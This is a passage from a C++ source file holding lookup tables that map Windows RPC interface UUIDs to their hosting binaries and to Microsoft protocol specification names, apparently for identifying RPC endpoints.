| { L"68B58241-C259-4F03-A2E5-A2651DCBC930", L"cryptsvc.dll" }, 177 | { L"1088A980-EAE5-11D0-8D9B-00A02453C337", L"mqqm.dll" }, 178 | { L"7EA70BCF-48AF-4F6A-8968-6A440754D5FA", L"nsisvc.dll" }, 179 | { L"EC02CAE0-B9E0-11D2-BE62-0020AFEDDF63", L"mq1repl.dll" }, 180 | { L"590B8BB3-4EF6-4CA4-83CF-BE06C4078674", L"PSIService.exe" }, 181 | { L"89759FCE-5A25-4086-8967-DE12F39A60B5", L"tssdjet.dll" }, 182 | { L"25952C5D-7976-4AA1-A3CB-C35F7AE79D1B", L"wlansvc.dll" }, 183 | { L"DF1941C5-FE89-4E79-BF10-463657ACF44D", L"efssvc.dll" }, 184 | { L"8F1ACDC1-754D-43EB-9629-AA1620928E65", L"IMEPADSM.DLL" }, 185 | { L"654976DF-1498-4056-A15E-CB4E87584BD8", L"emdmgmt.dll" }, 186 | { L"4FC742E0-4A10-11CF-8273-00AA004AE673", L"dfssvc.exe" }, 187 | { L"0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1", L"spoolsv.exe" }, 188 | { L"12D4B7C8-77D5-11D1-8C24-00C04FA3080D", L"lserver.dll" }, 189 | { L"8C7DAF44-B6DC-11D1-9A4C-0020AF6E7C57", L"appmgmts.dll" }, 190 | { L"9B8699AE-0E44-47B1-8E7F-86A461D7ECDC", L"rpcss.dll" }, 191 | { L"93149CA2-973B-11D1-8C39-00C04FB984F9", L"scecli.dll" }, 192 | { L"FC13257D-5567-4DEA-898D-C6F9C48415A0", L"mqqm.dll" }, 193 | { L"2FB92682-6599-42DC-AE13-BD2CA89BD11C", L"MPSSVC.dll" }, 194 | { L"333A2276-0000-0000-0D00-00809C000000", L"rpcrt4.dll" }, 195 | { L"D6D70EF0-0E3B-11CB-ACC3-08002B1D29C4", L"locator.exe" }, 196 | { L"1A9134DD-7B39-45BA-AD88-44D01CA47F28", L"mqqm.dll" }, 197 | { L"9B3195FE-D603-43D1-A0D5-9072D7CDE122", L"tssdjet.dll" }, 198 | { L"6F201A55-A24D-495F-AAC9-2F4FCE34DF98", L"iphlpsvc.dll" }, 199 | { L"897E2E5F-93F3-4376-9C9C-FD2277495C27", L"dfsrmig.exe" }, 200 | { L"98FE2C90-A542-11D0-A4EF-00A0C9062910", L"advapi32.dll" }, 201 | { L"30ADC50C-5CBC-46CE-9A0E-91914789E23C", L"nrpsrv.dll" }, 202 | { L"412F241E-C12A-11CE-ABFF-0020AF6E7A17", L"rpcss.dll" }, 203 | { L"9F3A53E6-CBB1-4E54-878E-AF9F823AA3F1", L"MpRtMon.dll" }, 204 | { L"1DFCE5A8-DD8A-4E33-AACE-F603922FD9E7", L"wpcsvc.dll" }, 205 | { L"D6D70EF0-0E3B-11CB-ACC3-08002B1D29C3", L"locator.exe" }, 206 | { L"E3D0D746-D2AF-40FD-8A7A-0D7078BB7092", L"qmgr.dll" }, 207 | { L"C6B5235A-E413-481D-9AC8-31681B1FAAF5", L"SCardSvr.dll" }, 208 | { L"7D814569-35B3-4850-BB32-83035FCEBF6E", L"ias.dll" }, 209 | { L"4825EA41-51E3-4C2A-8406-8F2D2698395F", L"userenv.dll" }, 210 | { L"99FCFEC4-5260-101B-BBCB-00AA0021347A", L"rpcss.dll" }, 211 | { L"3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5", L"dhcpcsvc.dll" }, 212 | { L"41208EE0-E970-11D1-9B9E-00E02C064C39", L"mqqm.dll" }, 213 | { L"CB407BBF-C14F-4CD9-8F55-CBB08146598C", L"IMJPDCT.EXE" }, 214 | { L"12345678-1234-ABCD-EF00-01234567CFFB", L"netlogon.dll" }, 215 | { L"83DA4C30-EA3A-11CF-9CC1-08003601E506", L"nfsclnt.exe" }, 216 | { L"2137A71F-BB5E-4E29-8E7E-2E46A6681DBF", L"wspsrv.exe - Microsoft ISA Server" }, 217 | { L"C0E9671E-33C6-4438-9464-56B2E1B1C7B4", L"wbiosrvc.dll" }, 218 | { L"AFA8BD80-7D8A-11C9-BEF4-08002B102989", L"rpcrt4.dll" }, 219 | { L"6AF13C8B-0844-4C83-9064-1892BA825527", L"tssdis.exe" }, 220 | { L"ECD85155-CC3A-4F10-AAD5-9A9A2BF2EF0C", L"termsrv.dll" }, 221 | { L"BB8B98E8-84DD-45E7-9F34-C3FB6155EEED", L"vaultsvc.dll" }, 222 | { L"D049B186-814F-11D1-9A3C-00C04FC9B232", L"ntfrs.exe" }, 223 | { L"64FE0B7F-9EF5-4553-A7DB-9A1975777554", L"rpcss.dll" }, 224 | { L"76F226C3-EC14-4325-8A99-6A46348418AE", L"winlogon.exe" }, 225 | { L"FD7A0523-DC70-43DD-9B2E-9C5ED48225B1", L"appinfo.dll" }, 226 | { L"342CFD40-3C6C-11CE-A893-08002B2E9C6D", L"llssrv.exe" }, 227 | { L"8FB6D884-2388-11D0-8C35-00C04FDA2795", L"w32time.dll" }, 228 | { L"AE33069B-A2A8-46EE-A235-DDFD339BE281", L"spoolsv.exe" }, 229 | { L"1D55B526-C137-46C5-AB79-638F2A68E869", L"rpcss.dll" }, 230 | { L"6E17AAA0-1A47-11D1-98BD-0000F875292E", L"clussvc.exe" }, 231 | { L"BDE95FDF-EEE0-45DE-9E12-E5A61CD0D4FE", L"termsrv.dll" }, 232 | { L"C100BEAC-D33A-4A4B-BF23-BBEF4663D017", L"wcncsvc.dll" }, 233 | { L"12345678-1234-ABCD-EF00-0123456789AB", L"spoolsv.exe" }, 234 | { L"8A7B5006-CC13-11DB-9705-005056C00008", L"appidsvc.dll" }, 235 | { L"91AE6020-9E3C-11CF-8D7C-00AA00C091BE", L"certsrv.exe" }, 236 | { L"8174BB16-571B-4C38-8386-1102B449044A", L"p2psvc.dll" }, 237 | { L"20610036-FA22-11CF-9823-00A0C911E5DF", L"rasmans.dll" }, 238 | { L"0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53", L"schedsvc.dll" }, 239 | { L"DD490425-5325-4565-B774-7E27D6C09C24", L"BFE.DLL" }, 240 | { L"F5CC5A7C-4264-101A-8C59-08002B2F8426", L"ntdsa.dll" }, 241 | { L"000001A0-0000-0000-C000-000000000046", L"rpcss.dll" }, 242 | { L"86D35949-83C9-4044-B424-DB363231FD0C", L"schedsvc.dll" }, 243 | { L"11220835-5B26-4D94-AE86-C3E475A809DE", L"lsasrv.dll" }, 244 | { L"C80066A8-7579-44FC-B9B2-8466930791B0", L"umrdp.dll" }, 245 | { L"F1EC59AB-4CA9-4C30-B2D0-54EF1DB441B7", L"iertutil.dll" }, 246 | { L"5267AABA-4F49-4653-8E26-D1E11F3F2AD9", L"termsrv.dll" }, 247 | { L"B9E79E60-3D52-11CE-AAA1-00006901293F", L"rpcss.dll" }, 248 | { L"3FAF4738-3A21-4307-B46C-FDDA9BB8C0D5", L"audiosrv.dll" }, 249 | { L"7F9D11BF-7FB9-436B-A812-B2D50C5D4C03", L"MPSSVC.dll" }, 250 | { L"B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86", L"keyiso.dll" }, 251 | { L"4B112204-0E19-11D3-B42B-0000F81FEB9F", L"ssdpsrv.dll" }, 252 | { L"04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA", L"efssvc.dll" }, 253 | { L"209BB240-B919-11D1-BBB6-0080C75E4EC1", L"irmon.dll" }, 254 | { L"76F03F96-CDFD-44FC-A22C-64950A001209", L"spoolsv.exe" }, 255 | { L"06BBA54A-BE05-49F9-B0A0-30F790261023", L"wscsvc.dll" }, 256 | { L"1BDDB2A6-C0C3-41BE-8703-DDBDF4F0E80A", L"dot3svc.dll" }, 257 | { L"AA411582-9BDF-48FB-B42B-FAA1EEE33949", L"nlasvc.dll" }, 258 | { L"D2D79DFA-3400-11D0-B40B-00AA005FF586", L"dmadmin.exe" }, 259 | { L"6099FC12-3EFF-11D0-ABD0-00C04FD91A4E", L"FXSAPI.dll" }, 260 | { L"2C9A33D5-F1DB-472D-8464-42B8B0C76C38", L"tbssvc.dll" }, 261 | { L"3DDE7C30-165D-11D1-AB8F-00805F14DB40", L"services.exe" }, 262 | { L"95958C94-A424-4055-B62B-B7F4D5C47770", L"winlogon.exe" }, 263 | { L"326731E3-C1C0-4A69-AE20-7D9044A4EA5C", L"profsvc.dll" }, 264 | { L"F5CC5A18-4264-101A-8C59-08002B2F8426", L"ntdsai.dll" }, 265 | { L"4BE96A0F-9F52-4729-A51D-C70610F118B0", L"wbiosrvc.dll" }, 266 | { L"82AD4280-036B-11CF-972C-00AA006887B0", L"infocomm.dll" }, 267 | { L"1F260487-BA29-4F13-928A-BBD29761B083", L"termsrv.dll" }, 268 | { L"18F70770-8E64-11CF-9AF1-0020AF6E72F4", L"ole32.dll" }, 269 | { L"FA4FEBC0-4591-11CE-95E5-00AA0051E510", L"autmgr32.exe" }, 270 | { L"708CCA10-9569-11D1-B2A5-0060977D8118", L"mqdssrv.dll" }, 271 | { L"45F52C28-7F9F-101A-B52B-08002B2EFABE", L"WINS.EXE" }, 272 | { L"2F59A331-BF7D-48CB-9E5C-7C090D76E8B8", L"termsrv.dll" }, 273 | { L"4A452661-8290-4B36-8FBE-7F4093A94978", L"spoolsv.exe" }, 274 | }; 275 | 276 | 277 | std::unordered_map KNOWN_PROTOCOLS = { 278 | { L"52C80B95-C1AD-4240-8D89-72E9FA84025E", L"[MC-CCFG]: Server Cluster:" }, 279 | { L"FA7660F6-7B3F-4237-A8BF-ED0AD0DCBBD9", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 280 | { L"450386DB-7409-4667-935E-384DBBEE2A9E", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 281 | { L"832A32F7-B3EA-4B8C-B260-9A2923001184", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 282 | { L"2D9915FB-9D42-4328-B782-1B46819FAB9E", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 283 | { L"0DD8A158-EBE6-4008-A1D9-B7ECC8F1104B", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 284 | { L"0716CAF8-7D05-4A46-8099-77594BE91394", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 285 | { L"B80F3C42-60E0-4AE0-9007-F52852D3DBED", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 286 | { L"0344CDDA-151E-4CBF-82DA-66AE61E97754", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 287 | { L"8BED2C68-A5FB-4B28-8581-A0DC5267419F", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 288 | { L"7883CA1C-1112-4447-84C3-52FBEB38069D", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 289 | { L"09829352-87C2-418D-8D79-4133969A489D", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 290 | { L"5B5A68E6-8B9F-45E1-8199-A95FFCCDFFFF", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 291 | { L"9BE77978-73ED-4A9A-87FD-13F09FEC1B13", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 292 | { L"ED35F7A1-5024-4E7B-A44D-07DDAF4B524D", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 293 | { L"4DFA1DF3-8900-4BC7-BBB5-D1A458C52410", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 294 | { L"370AF178-7758-4DAD-8146-7391F6E18585", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 295 | { L"C8550BFF-5281-4B1E-AC34-99B6FA38464D", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 296 | { L"08A90F5F-0702-48D6-B45F-02A9885A9768", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 297 | { L"8F6D760F-F0CB-4D69-B5F6-848B33E9BDC6", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 298 | { L"E7927575-5CC3-403B-822E-328A6B904BEE", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 299 | { L"DE095DB1-5368-4D11-81F6-EFEF619B7BCF", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 300 | { L"64FF8CCC-B287-4DAE-B08A-A72CBF45F453", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 301 | { L"EAFE4895-A929-41EA-B14D-613E23F62B71", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 302 | { L"EF13D885-642C-4709-99EC-B89561C6BC69", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 303 | { L"0191775E-BCFF-445A-B4F4-3BDDA54E2816", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 304 | { L"31A83EA0-C0E4-4A2C-8A01-353CC2A4C60A", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 305 | { L"D6C7CD8F-BB8D-4F96-B591-D3A5F1320269", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 306 | { L"ADA4E6FB-E025-401E-A5D0-C3134A281F07", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 307 | { L"B7D381EE-8860-47A1-8AF4-1F33B2B1F325", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 308 | { L"C5C04795-321C-4014-8FD6-D44658799393", L"[MC-IISA]: Internet Information Services (IIS) Application Host COM" }, 309 | { L"EBA96B22-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 310 | { L"12A30900-7300-11D2-B0E6-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 311 | { L"EBA96B24-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 312 | { L"2CE0C5B0-6E67-11D2-B0E6-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 313 | { L"EBA96B0E-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 314 | { L"B196B285-BAB4-101A-B69C-00AA00341D07", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 315 | { L"39CE96FE-F4C5-4484-A143-4C2D5D324229", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 316 | { L"D7D6E07F-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 317 | { L"EBA96B1A-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 318 | { L"EBA96B18-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 319 | { L"EBA96B23-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 320 | { L"EBA96B14-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 321 | { L"FD174A80-89CF-11D2-B0F2-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 322 | { L"F72B9031-2F0C-43E8-924E-E6052CDC493F", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 323 | { L"D7D6E072-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 324 | { L"D7D6E075-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 325 | { L"0188401C-247A-4FED-99C6-BF14119D7055", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 326 | { L"EBA96B15-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 327 | { L"D7D6E07C-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 328 | { L"BE5F0241-E489-4957-8CC4-A452FCF3E23E", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 329 | { L"EBA96B1C-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 330 | { L"D7D6E077-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 331 | { L"D7D6E078-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 332 | { L"B196B284-BAB4-101A-B69C-00AA00341D07", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 333 | { L"D7D6E073-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 334 | { L"D7D6E07D-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 335 | { L"EBA96B1B-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 336 | { L"D7D6E079-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 337 | { L"D7D6E084-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 338 | { L"EBA96B1F-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 339 | { L"33B6D07E-F27D-42FA-B2D7-BF82E11E9374", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 340 | { L"D7D6E07A-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 341 | { L"0188AC2F-ECB3-4173-9779-635CA2039C72", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 342 | { L"D7D6E085-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 343 | { L"EF0574E0-06D8-11D3-B100-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 344 | { L"D7D6E086-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 345 | { L"B196B286-BAB4-101A-B69C-00AA00341D07", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 346 | { L"D9933BE0-A567-11D2-B0F3-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 347 | { L"D7AB3341-C9D3-11D1-BB47-0080C7C5A2C0", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 348 | { L"D7D6E082-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 349 | { L"0FB15084-AF41-11CE-BD2B-204C4F4F5020", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 350 | { L"D7D6E083-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 351 | { L"EBA96B13-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 352 | { L"EBA96B1D-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 353 | { L"EBA96B17-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 354 | { L"EBA96B20-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 355 | { L"D7D6E074-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 356 | { L"7FBE7759-5760-444D-B8A5-5E7AB9A84CCE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 357 | { L"B196B287-BAB4-101A-B69C-00AA00341D07", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 358 | { L"EBA96B12-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 359 | { L"EBA96B1E-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 360 | { L"D7D6E07E-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 361 | { L"D7D6E081-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 362 | { L"D7D6E07B-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 363 | { L"64C478FB-F9B0-4695-8A7F-439AC94326D3", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 364 | { L"EBA96B16-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 365 | { L"EBA96B19-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 366 | { L"EBA96B10-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 367 | { L"EBA96B21-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 368 | { L"D7D6E076-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 369 | { L"EBA96B0F-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 370 | { L"EBA96B11-2168-11D3-898C-00E02C074F6B", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 371 | { L"D7D6E080-DCCD-11D0-AA4B-0060970DEBAE", L"[MC-MQAC]: Message Queuing (MSMQ):" }, 372 | { L"4639DB2A-BFC5-11D2-9318-00C04FBBBFB3", L"[MS-ADTG]: Remote Data Services (RDS) Transport Protocol" }, 373 | { L"0EAC4842-8763-11CF-A743-00AA00A3F00D", L"[MS-ADTG]: Remote Data Services (RDS) Transport Protocol" }, 374 | { L"070669EB-B52F-11D1-9270-00C04FBBBFB3", L"[MS-ADTG]: Remote Data Services (RDS) Transport Protocol" }, 375 | { L"3DDE7C30-165D-11D1-AB8F-00805F14DB40", L"[MS-BKRP]: BackupKey Remote Protocol" }, 376 | { L"E3D0D746-D2AF-40FD-8A7A-0D7078BB7092", L"[MS-BPAU]: Background Intelligent Transfer Service (BITS) Peer-" }, 377 | { L"6BFFD098-A112-3610-9833-012892020162", L"[MS-BRWSA]: Common Internet File System (CIFS) Browser Auxiliary" }, 378 | { L"AFC07E2E-311C-4435-808C-C483FFEEC7C9", L"[MS-CAPR]: Central Access Policy Identifier (ID) Retrieval Protocol" }, 379 | { L"B97DB8B2-4C63-11CF-BFF6-08002BE23F2F", L"[MS-CMRP]: Failover Cluster:" }, 380 | { L"97199110-DB2E-11D1-A251-0000F805CA53", L"[MS-COM]: Component Object Model Plus (COM+) Protocol" }, 381 | { L"0E3D6630-B46B-11D1-9D2D-006008B0E5CA", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 382 | { L"3F3B1B86-DBBE-11D1-9DA6-00805F85CFE3", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 383 | { L"7F43B400-1A0E-4D57-BBC9-6B0C65F7A889", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 384 | { L"456129E2-1078-11D2-B0F9-00805FC73204", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 385 | { L"8DB2180E-BD29-11D1-8B7E-00C04FD7A924", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 386 | { L"182C40FA-32E4-11D0-818B-00A0C9231C29", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 387 | { L"971668DC-C3FE-4EA1-9643-0C7230F494A1", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 388 | { L"98315903-7BE5-11D2-ADC1-00A02463D6E7", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 389 | { L"6C935649-30A6-4211-8687-C4C83E5FE1C7", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 390 | { L"F131EA3E-B7BE-480E-A60D-51CB2785779E", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 391 | { L"1F7B1697-ECB2-4CBB-8A0E-75C427F4A6F0", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 392 | { L"A8927A41-D3CE-11D1-8472-006008B0E5CA", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 393 | { L"CFADAC84-E12C-11D1-B34C-00C04F990D54", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 394 | { L"1D118904-94B3-4A64-9FA6-ED432666A7B9", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 395 | { L"47CDE9A1-0BF6-11D2-8016-00C04FB9988E", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 396 | { L"0E3D6631-B46B-11D1-9D2D-006008B0E5CA", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 397 | { L"C2BE6970-DF9E-11D1-8B87-00C04FD7A924", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 398 | { L"C726744E-5735-4F08-8286-C510EE638FB6", L"[MS-COMA]: Component Object Model Plus (COM+) Remote" }, 399 | { L"FBC1D17D-C498-43A0-81AF-423DDD530AF6", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 400 | { L"F89AC270-D4EB-11D1-B682-00805FC79216", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 401 | { L"FB2B72A1-7A68-11D1-88F9-0080C7D771BF", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 402 | { L"4E14FB9F-2E22-11D1-9964-00C04FBBB345", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 403 | { L"A0E8F27A-888C-11D1-B763-00C04FB926AF", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 404 | { L"7FB7EA43-2D76-4EA8-8CD9-3DECC270295E", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 405 | { L"99CC098F-A48A-4E9C-8E58-965C0AFC19D5", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 406 | { L"FB2B72A0-7A68-11D1-88F9-0080C7D771BF", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 407 | { L"4A6B0E16-2E38-11D1-9965-00C04FBBB345", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 408 | { L"F4A07D63-2E25-11D1-9964-00C04FBBB345", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 409 | { L"4A6B0E15-2E38-11D1-9965-00C04FBBB345", L"[MS-COMEV]: Component Object Model Plus (COM+) Event System" }, 410 | { L"B60040E0-BCF3-11D1-861D-0080C729264D", L"[MS-COMT]: Component Object Model Plus (COM+) Tracker Service" }, 411 | { L"23C9DD26-2355-4FE2-84DE-F779A238ADBD", L"[MS-COMT]: Component Object Model Plus (COM+) Tracker Service" }, 412 | { L"4E6CDCC9-FB25-4FD5-9CC5-C9F4B6559CEC", L"[MS-COMT]: Component Object Model Plus (COM+) Tracker Service" }, 413 | { L"D99E6E71-FC88-11D0-B498-00A0C90312F3", L"[MS-CSRA]: Certificate Services Remote Administration Protocol" }, 414 | { L"7FE0D935-DDA6-443F-85D0-1CFB58FE41DD", L"[MS-CSRA]: Certificate Services Remote Administration Protocol" }, 415 | { L"E1568352-586D-43E4-933F-8E6DC4DE317A", L"[MS-CSVP]: Failover Cluster:" }, 416 | { L"11942D87-A1DE-4E7F-83FB-A840D9C5928D", L"[MS-CSVP]: Failover Cluster:" }, 417 | { L"491260B5-05C9-40D9-B7F2-1F7BDAE0927F", L"[MS-CSVP]: Failover Cluster:" }, 418 | { L"C72B09DB-4D53-4F41-8DCC-2D752AB56F7C", L"[MS-CSVP]: Failover Cluster:" }, 419 | { L"E3C9B851-C442-432B-8FC6-A7FAAFC09D3B", L"[MS-CSVP]: Failover Cluster:" }, 420 | { L"4142DD5D-3472-4370-8641-DE7856431FB0", L"[MS-CSVP]: Failover Cluster:" }, 421 | { L"D6105110-8917-41A5-AA32-8E0AA2933DC9", L"[MS-CSVP]: Failover Cluster:" }, 422 | { L"A6D3E32B-9814-4409-8DE3-CFA673E6D3DE", L"[MS-CSVP]: Failover Cluster:" }, 423 | { L"04D55210-B6AC-4248-9E69-2A569D1D2AB6", L"[MS-CSVP]: Failover Cluster:" }, 424 | { L"2931C32C-F731-4C56-9FEB-3D5F1C5E72BF", L"[MS-CSVP]: Failover Cluster:" }, 425 | { L"12108A88-6858-4467-B92F-E6CF4568DFB6", L"[MS-CSVP]: Failover Cluster:" }, 426 | { L"85923CA7-1B6B-4E83-A2E4-F5BA3BFBB8A3", L"[MS-CSVP]: Failover Cluster:" }, 427 | { L"F1D6C29C-8FBE-4691-8724-F6D8DEAEAFC8", L"[MS-CSVP]: Failover Cluster:" }, 428 | { L"3CFEE98C-FB4B-44C6-BD98-A1DB14ABCA3F", L"[MS-CSVP]: Failover Cluster:" }, 429 | { L"88E7AC6D-C561-4F03-9A60-39DD768F867D", L"[MS-CSVP]: Failover Cluster:" }, 430 | { L"00000131-0000-0000-C000-000000000046", L"[MS-DCOM]: Distributed Component Object Model (DCOM) Remote" }, 431 | { L"4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57", L"[MS-DCOM]: Distributed Component Object Model (DCOM) Remote" }, 432 | { L"00000143-0000-0000-C000-000000000046", L"[MS-DCOM]: Distributed Component Object Model (DCOM) Remote" }, 433 | { L"000001A0-0000-0000-C000-000000000046", L"[MS-DCOM]: Distributed Component Object Model (DCOM) Remote" }, 434 | { L"99FCFEC4-5260-101B-BBCB-00AA0021347A", L"[MS-DCOM]: Distributed Component Object Model (DCOM) Remote" }, 435 | { L"00000000-0000-0000-C000-000000000046", L"[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol" }, 436 | { L"4FC742E0-4A10-11CF-8273-00AA004AE673", L"[MS-DFSNM]: Distributed File System (DFS):" }, 437 | { L"9009D654-250B-4E0D-9AB0-ACB63134F69F", L"[MS-DFSRH]: DFS Replication Helper Protocol" }, 438 | { 